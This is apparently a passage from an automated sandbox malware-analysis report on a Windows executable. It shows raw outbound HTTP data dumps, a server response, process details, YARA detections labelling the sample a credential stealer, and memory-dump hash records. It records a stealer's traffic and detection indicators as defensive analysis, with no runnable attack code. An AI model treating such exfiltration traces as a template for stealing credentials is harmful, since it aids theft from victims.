                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 5d 34 76 78 82 31 37 b8 f5 c2 d8 95 ed 8b cf b3 92 05 c7 c2 4c 3a 29 c1 17 ed 8d 7a 23 4a 7d f6 16 d7 15 eb 94 40 95 a6 74 be 48 8e f7 c0 42 8e b7 0d 34 d3 14 b6 17 55 11 c5 d8 06 9b 96 05 e4 fc 78 4d 80 14 c6 8c 37 fc c0 80 17 75 03 37 7d 76 9a da 4a 02 51 c6 bd 82 60 7c 64 f7 a7 d4 ab 6f 2e eb 73 bd ec 66 b2 ff ce 1d fd d6 71 19 4f c8 7a 18 ba fe 26 0d 69 af ea 0e 0b 2d 36 9f d7 fd df 46 46 31 d6 4f d8 bf 85 66 6f 4d 8e c4 a3 58 cc 5c d3 8d e7 cd d2 b0 e1 23 3f e4 d4 43 34 df 30 73 8d 47 71 b6 a1 c6 04 8e 1d 3a 9e 98 97 1b d8 b1 e7 a4 12 ac 9d fe 94 55 be fd a2 9c 6b 0a ab 72 fb 1e 33 33 66 54 87 92 95 84 e4 b0 72 1a 49 37 3e 3e 2f 6a 5c fb 90 21 e0 56 cc 5b 6d a0 66 8b b0 8f ab 67 ca af 86 68 97 e6 d8 54 9d a1 a3 47 e5 a9 05 b9 17 49 34 1d 96 c9 6e 7e
                                                                                                      Data Ascii: ]4vx17L:)z#J}@tHB4UxM7u7}vJQ`|do.sfqOz&i-6FF1OfoMX\#?C40sGq:Ukr33fTrI7>>/j\!V[mfghTGI4n~
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: c0 28 60 95 af 37 5c bd ba 6e 52 df 74 11 14 f9 cf f4 60 40 9f 3b db c5 63 96 22 02 3e ed 9e f0 fb 74 e1 eb d4 ec 9e dc 7d 03 81 6d c9 14 46 d5 c3 62 c1 b1 9d ec b7 4b 06 63 21 35 e5 23 1f 88 d6 99 a6 4b 11 d7 6c 62 8e b7 98 37 76 8b 83 6d 0a 64 9b bd e4 bf 14 46 01 74 6c db 88 6a da 8d 08 71 d2 79 af 22 49 9e 74 f3 5d 11 9f 23 91 e8 bc 97 7b b5 aa ba 87 13 b6 77 2e 94 ff 3d 6d ae 87 92 ad f0 3a e1 cf bf 39 3e bd d9 10 52 90 2d 53 7e 18 41 15 0c 26 2c ac 33 32 52 2b 0d 3a 79 fb 6b f5 c3 2b df e1 30 5f 4e 9e 70 f9 b0 27 33 3f f0 99 82 d3 ea 6b 85 d3 ab 8f 15 ca ff 1e 3d 7a e2 63 14 24 a7 ef b1 a2 70 d5 b7 7b 2f 11 ed 12 80 56 de bc 57 a6 ec 18 2e 3c 69 63 cc f3 f8 02 97 98 ab 66 25 68 8b 13 dc 6c 5f eb c4 ed df 44 79 a3 7a 3b 4f f5 fd 13 64 a5 03 e8 c6 97
                                                                                                      Data Ascii: (`7\nRt`@;c">t}mFbKc!5#Klb7vmdFtljqy"It]#{w.=m:9>R-S~A&,32R+:yk+0_Np'3?k=zc$p{/VW.<icf%hl_Dyz;Od
                                                                                                      2024-12-23 16:41:28 UTC1135INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=fn7kgp55akedmg8km17ont2cll; expires=Fri, 18 Apr 2025 10:28:07 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fRtXhcerwBRYlntuK57tS94pkxG9eH3HyGsl%2Btr%2BSivaWgpbph6ff8GB6jaTUSlyk%2BWhyZkpJfn0FqMaqtXzAV5%2FaZ0bvMdd%2B8Tr238d2g0GvXJkHlaejHLbCD3zSg2Mqk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc936a11de97-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1603&rtt_var=605&sent=329&recv=582&lost=0&retrans=0&sent_bytes=2836&recv_bytes=555450&delivery_rate=1804697&cwnd=231&unsent_bytes=0&cid=c6f9dfc098878285&ts=2427&x=0"


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Target ID:0
                                                                                                      Start time:11:41:07
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\NxqDwaYpbp.exe"
                                                                                                      Imagebase:0x450000
                                                                                                      File size:1'858'560 bytes
                                                                                                      MD5 hash:18A540AE13744F52861C16CB38C7DBA4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1425952376.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1423605757.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1426155791.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1447330697.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A75000, based on PE: false
                                                                                                        • Associated: 00000000.00000003.1423605757.0000000000A75000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a75000_NxqDwaYpbp.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7ac296b822f4611c6e82e7b614e5ba11481d77ddceda19d9bd00ef569bde2fe4
                                                                                                        • Instruction ID: 356d926f5775bb17c1e330abc1f97e79e8bce4f2aaf874028bc3e7b3c664ec6a
                                                                                                        • Opcode Fuzzy Hash: 7ac296b822f4611c6e82e7b614e5ba11481d77ddceda19d9bd00ef569bde2fe4
                                                                                                        • Instruction Fuzzy Hash: E3F1749285E3C11FC75387704CBAA95BF706E23114B5E86DFC4C98E8E3E249884AC767
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1447330697.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A75000, based on PE: false
                                                                                                        • Associated: 00000000.00000003.1423605757.0000000000A75000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a75000_NxqDwaYpbp.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a27024db71b2b3fb38993661a7b89377d06e717e525bcc65e88c1f33aa4bbcc
                                                                                                        • Instruction ID: c94ab0c33a765f3c573d7759ffe5b904ed9b55fbbd4675482655f7136331d122
                                                                                                        • Opcode Fuzzy Hash: 2a27024db71b2b3fb38993661a7b89377d06e717e525bcc65e88c1f33aa4bbcc
                                                                                                        • Instruction Fuzzy Hash: EDB1969281E3C14FC72787704C79655BFB06E23218B1EC6DFC4DA8E4A3E299485AC763
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A37000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d6c7c23c56ab4608ebc0b83e2d57937917dc50938f5a99790c08c9812c75d46
                                                                                                        • Instruction ID: 3d52a32f0576753d928b8b9b4340f27c64990135ceb6cc425b01bf948dcbe371
                                                                                                        • Opcode Fuzzy Hash: 0d6c7c23c56ab4608ebc0b83e2d57937917dc50938f5a99790c08c9812c75d46
                                                                                                        • Instruction Fuzzy Hash: 92A1E22181E3C50FD7278BB04979492BFB06E23204B1EC6EFD8D58F4A3D759994AD722
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A28000, based on PE: false
                                                                                                        • Associated: 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d6c7c23c56ab4608ebc0b83e2d57937917dc50938f5a99790c08c9812c75d46
                                                                                                        • Instruction ID: 3d52a32f0576753d928b8b9b4340f27c64990135ceb6cc425b01bf948dcbe371
                                                                                                        • Opcode Fuzzy Hash: 0d6c7c23c56ab4608ebc0b83e2d57937917dc50938f5a99790c08c9812c75d46
                                                                                                        • Instruction Fuzzy Hash: 92A1E22181E3C50FD7278BB04979492BFB06E23204B1EC6EFD8D58F4A3D759994AD722
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A37000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b1e0e59d910f019d4d01bf9d3bf0605610fd9f6c54a04edc65c3145fd07c84d6
                                                                                                        • Instruction ID: 5c8d8352d068a5740a9f2536e84aaef26c0c304588c35d7e4f6ee634854b8602
                                                                                                        • Opcode Fuzzy Hash: b1e0e59d910f019d4d01bf9d3bf0605610fd9f6c54a04edc65c3145fd07c84d6
                                                                                                        • Instruction Fuzzy Hash: 2181E02181E3C50FD7178BB04979492BFB06E23204B1EC6EFD8D98F4A3D759984AD322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A28000, based on PE: false
                                                                                                        • Associated: 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b1e0e59d910f019d4d01bf9d3bf0605610fd9f6c54a04edc65c3145fd07c84d6
                                                                                                        • Instruction ID: 5c8d8352d068a5740a9f2536e84aaef26c0c304588c35d7e4f6ee634854b8602
                                                                                                        • Opcode Fuzzy Hash: b1e0e59d910f019d4d01bf9d3bf0605610fd9f6c54a04edc65c3145fd07c84d6
                                                                                                        • Instruction Fuzzy Hash: 2181E02181E3C50FD7178BB04979492BFB06E23204B1EC6EFD8D98F4A3D759984AD322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A37000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9446a2c6a8dbcf8d13e4282f187b2356cbffa0cde775954644035086d1e135bc
                                                                                                        • Instruction ID: f79336b80866cc4a2095a787499b71d713cf0810a4d9cf5005d24483a3b0918e
                                                                                                        • Opcode Fuzzy Hash: 9446a2c6a8dbcf8d13e4282f187b2356cbffa0cde775954644035086d1e135bc
                                                                                                        • Instruction Fuzzy Hash: 8E2122651092D18FC303CF34D494A92BFA1FF8B31639E40DCD9C18F427C2A56542CB42
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1497935897.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A28000, based on PE: false
                                                                                                        • Associated: 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_a28000_NxqDwaYpbp.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9446a2c6a8dbcf8d13e4282f187b2356cbffa0cde775954644035086d1e135bc
                                                                                                        • Instruction ID: f79336b80866cc4a2095a787499b71d713cf0810a4d9cf5005d24483a3b0918e
                                                                                                        • Opcode Fuzzy Hash: 9446a2c6a8dbcf8d13e4282f187b2356cbffa0cde775954644035086d1e135bc
                                                                                                        • Instruction Fuzzy Hash: 8E2122651092D18FC303CF34D494A92BFA1FF8B31639E40DCD9C18F427C2A56542CB42